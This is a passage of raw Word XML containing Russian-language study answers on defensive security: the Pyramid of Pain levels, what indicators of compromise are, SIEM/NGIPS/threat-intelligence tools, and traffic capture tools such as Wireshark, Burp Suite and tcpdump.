        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF313D6" w14:textId="39AF8AC6" w:rsidR="00EF4857" w:rsidRDefault="00EF4857" w:rsidP="00EF4857">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>values</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>хеши</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. П</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>роводится проверка всех данных/файлов</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> по их эталонным хеш-значениям. Этот уро</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">вень является «тривиальным», т.к. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>злоумышленникам нетрудно поменять один хеш на другой.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034E01F2" w14:textId="77777777" w:rsidR="00EF4857" w:rsidRPr="00EF4857" w:rsidRDefault="00EF4857" w:rsidP="00EF4857">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>addresses</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (IP-адреса)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Проверка по IP-адресам однозначно идентифицирует источник данных (компьютер или любое устройство, подключённое к интернету). Этот уровень оценивается как «лёгкий».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118FE6C4" w14:textId="6A749261" w:rsidR="00EF4857" w:rsidRDefault="00EF4857" w:rsidP="00EF4857">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>names</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (доменные имена)</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF4857">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Выполняется сравнение по текстовым строкам, идентифицирующим интернет-источник, откуда получены данные, например, веб-сайт или сервер. Характеристика этого уровня — «простой».</w:t>
      </w:r>
      <w:r w:rsidR="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00350F0A" w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SOC может использовать репутацию доменов для блокировки и ограничения вредоносной активности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA2D428" w14:textId="77777777" w:rsidR="00350F0A" w:rsidRPr="00350F0A" w:rsidRDefault="00350F0A" w:rsidP="00350F0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>artifacts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (сетевые артефакты / артефакты хоста)</w:t>
      </w:r>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Подразумевается анализ следов активности в трафике или на хосте (компьютере). Этот уровень характеризуется как «раздражающий».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308211DA" w14:textId="7E772BB8" w:rsidR="00350F0A" w:rsidRDefault="00350F0A" w:rsidP="00350F0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Tools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (инструменты).</w:t>
      </w:r>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Речь идёт об обнаружении и нейтрализации программных средств, которые могут быть запущены в инфраструктуре (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00451423">
        <w:t>backdoor</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> или программ для подбора паролей). Этот уровень «проблематичен».</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114CC04D" w14:textId="2CA5E7AA" w:rsidR="00EF4857" w:rsidRPr="00EF4857" w:rsidRDefault="00350F0A" w:rsidP="00350F0A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>TTPs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (тактики, методы и процедуры).</w:t>
      </w:r>
      <w:r w:rsidRPr="00350F0A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Находящийся на вершине пирамиды «тяжёлый» уровень охватывает сами принципы, на которых стр</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>оится вредоносная деятельность.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF600D8" w14:textId="77777777" w:rsidR="001C0D05" w:rsidRDefault="001C0D05" w:rsidP="001C0D05">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D67DDD" w14:textId="62A025E0" w:rsidR="00591BB4" w:rsidRPr="008C2EBE" w:rsidRDefault="00591BB4" w:rsidP="00587ED5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Что такое </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IoC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FF0B70" w14:textId="61D67820" w:rsidR="008C2EBE" w:rsidRDefault="008C2EBE" w:rsidP="008C2EBE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BCB4BFF" w14:textId="65F4FC3F" w:rsidR="008C2EBE" w:rsidRDefault="008C2EBE" w:rsidP="008C2EBE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Ответ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027DF932" w14:textId="7F9331D7" w:rsidR="008C2EBE" w:rsidRDefault="008C2EBE" w:rsidP="008C2EBE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00395645">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008C2EBE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Индикаторы компрометации (</w:t>
      </w:r>
      <w:r w:rsidRPr="008C2EBE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IOC</w:t>
      </w:r>
      <w:r w:rsidRPr="008C2EBE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00D07BD6" w:rsidRPr="00D07BD6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="00D07BD6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>это подсказки или доказательства</w:t>
      </w:r>
      <w:r w:rsidRPr="008C2EBE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, которые позволяют предположить, что сеть или система были взломаны или атакованы. Например, </w:t>
      </w:r>
      <w:r w:rsidRPr="008C2EBE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IOC</w:t>
      </w:r>
      <w:r w:rsidRPr="008C2EBE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> могут быть необычным поведением сетевого трафика, неожиданными установками </w:t>
      </w:r>
      <w:r w:rsidR="002A70C1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ПО</w:t>
      </w:r>
      <w:r w:rsidRPr="008C2EBE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, входами пользователей из </w:t>
      </w:r>
      <w:r w:rsidR="00D07BD6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>аномальных</w:t>
      </w:r>
      <w:r w:rsidRPr="008C2EBE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> мест и большим количеством запросов к одному и тому же файлу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2C4E88" w14:textId="74CD76F1" w:rsidR="00D07BD6" w:rsidRDefault="00D07BD6" w:rsidP="008C2EBE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6197ADC6" w14:textId="05B0584D" w:rsidR="00010C89" w:rsidRDefault="00D07BD6" w:rsidP="008C2EBE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D07BD6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Управление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IoCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D07BD6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>это</w:t>
      </w:r>
      <w:r w:rsidRPr="00D07BD6">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> подход, основанный на данных об известных угрозах. Новые, продвинутые угрозы могут ускользнуть от обнаружения угроз на основе индикаторов.</w:t>
      </w:r>
      <w:r w:rsidR="00010C89">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00010C89" w:rsidRPr="00010C89">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>IOC</w:t>
      </w:r>
      <w:r w:rsidR="002A70C1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00010C89" w:rsidRPr="00010C89">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> более эффективны в сочетании с упреждающими мерами для более быстрого обнаружения угроз, такими как безопасность </w:t>
      </w:r>
      <w:r w:rsidR="00010C89">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>хостов</w:t>
      </w:r>
      <w:r w:rsidR="00010C89" w:rsidRPr="00010C89">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, анализ угроз в реальном времени, платформы управления угрозами и контроль доступа к идентификационным данным.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB8ADB9" w14:textId="4CEC05C2" w:rsidR="00585496" w:rsidRDefault="00585496" w:rsidP="008C2EBE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15A5B8AC" w14:textId="7F69B6A1" w:rsidR="002A70C1" w:rsidRPr="002A70C1" w:rsidRDefault="002A70C1" w:rsidP="002A70C1">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Инструменты</w:t>
      </w:r>
      <w:r w:rsidRPr="002A70C1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15904776" w14:textId="72C99BCB" w:rsidR="002A70C1" w:rsidRDefault="002A70C1" w:rsidP="008C2EBE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A70C1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Система предотвращения вторжений нового поколения (NGIPS).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> С</w:t>
      </w:r>
      <w:r w:rsidRPr="002A70C1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>истемы NGIPS непрерывно отслеживают поведенческие IOC пользователей и устройств.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DD9C39" w14:textId="77777777" w:rsidR="002A70C1" w:rsidRDefault="002A70C1" w:rsidP="008C2EBE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6AA72B" w14:textId="2C6F3250" w:rsidR="002A70C1" w:rsidRPr="002A70C1" w:rsidRDefault="002A70C1" w:rsidP="008C2EBE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED28B5">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Система управления информационной безопасностью</w:t>
      </w:r>
      <w:r w:rsidRPr="002A70C1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (SIEM). </w:t>
      </w:r>
      <w:r w:rsidRPr="002A70C1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Когда действия коррелируют с известными IOC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="002A70C1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, решение SIEM генерирует приоритетные оповещения на основе заранее определенных политик и обеспечивает автоматическое реагирование на потенциальный инцидент безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC440A1" w14:textId="6778F99D" w:rsidR="00585496" w:rsidRDefault="002A70C1" w:rsidP="008C2EBE">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A70C1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Платформы </w:t>
      </w:r>
      <w:r w:rsidRPr="002A70C1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="002A70C1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>hreat intelligence.</w:t>
      </w:r>
      <w:r w:rsidRPr="002A70C1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2A70C1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">нструменты кибербезопасности, которые объединяют и анализируют огромные объемы глобальных данных из различных источников для предоставления </w:t>
      </w:r>
      <w:r w:rsidR="00520526">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>полезной</w:t>
      </w:r>
      <w:r w:rsidRPr="002A70C1">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> информации о возникающих угрозах кибербезопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270CF0B3" w14:textId="2E457652" w:rsidR="00A53F70" w:rsidRPr="00A53F70" w:rsidRDefault="00A53F70" w:rsidP="008C2EBE">
      <w:pPr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######################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3F196E" w14:textId="77777777" w:rsidR="008C2EBE" w:rsidRPr="00755D9E" w:rsidRDefault="008C2EBE" w:rsidP="008C2EBE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CA77880" w14:textId="39D8FBA2" w:rsidR="00E230DA" w:rsidRDefault="00E230DA" w:rsidP="00E230DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Какими средства</w:t>
      </w:r>
      <w:r w:rsidR="008615D3">
        <w:t>ми</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> можно произвести захват </w:t>
      </w:r>
      <w:r w:rsidR="008615D3">
        <w:t xml:space="preserve">сетевого </w:t>
      </w:r>
      <w:r>
        <w:t>трафика?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C89FB86" w14:textId="24EDCA8B" w:rsidR="00A53F70" w:rsidRDefault="00A53F70" w:rsidP="00A53F70">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="517FF49C" w14:textId="0EDE18F3" w:rsidR="00A53F70" w:rsidRPr="00EE2789" w:rsidRDefault="00A53F70" w:rsidP="00A53F70">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Ответ</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE2789">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796FE20A" w14:textId="188A39B4" w:rsidR="00A53F70" w:rsidRDefault="00A53F70" w:rsidP="00A53F70">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE2789">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A53F70">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidRPr="00A53F70">
        <w:t xml:space="preserve"> это анализатор сетевых протоколов. Он позволяет захватывать и интерактивно просматривать трафик, проходящий в компьютерной сети. Сетевые специалисты, эксперты по безопасности, разработчики и преподаватели по всему миру регулярно используют его.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D465D7" w14:textId="22D998D6" w:rsidR="00A53F70" w:rsidRPr="00EE2789" w:rsidRDefault="00A53F70" w:rsidP="00A53F70">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A53F70">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Burp</w:t>
      </w:r>
      <w:r w:rsidRPr="00A53F70">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A53F70">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Suite</w:t>
      </w:r>
      <w:r w:rsidRPr="00A53F70">
        <w:t xml:space="preserve"> – это набор инструментов, который выбирают тестировщики веб-безопасности. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Одна из множества функций </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A53F70">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidR="004646C7">
        <w:t>п</w:t>
      </w:r>
      <w:r>
        <w:t>ерехватывать</w:t>
      </w:r>
      <w:r w:rsidRPr="00A53F70">
        <w:t xml:space="preserve"> все, что видит ваш браузер</w:t>
      </w:r>
      <w:r>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidR="004646C7">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C901A5" w14:textId="0D58396F" w:rsidR="00820298" w:rsidRDefault="00820298" w:rsidP="00A53F70">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00EE2789">
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00820298">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00820298">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>э</w:t>
      </w:r>
      <w:r w:rsidRPr="00820298">
        <w:t>то универсальная утилита командной строки, которую сетевые администраторы часто используют для устранения неполадок.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> М</w:t>
      </w:r>
      <w:r w:rsidRPr="00820298">
        <w:t>ожно использовать для захвата сетевого трафика в системе Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA01E49" w14:textId="415037BC" w:rsidR="00820298" w:rsidRPr="00820298" w:rsidRDefault="00820298" w:rsidP="00A53F70">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>######################################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248DB4A1" w14:textId="77777777" w:rsidR="00A53F70" w:rsidRPr="00A53F70" w:rsidRDefault="00A53F70" w:rsidP="00A53F70">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FC6B205" w14:textId="298F582F" w:rsidR="00E230DA" w:rsidRDefault="00E230DA" w:rsidP="00E230DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
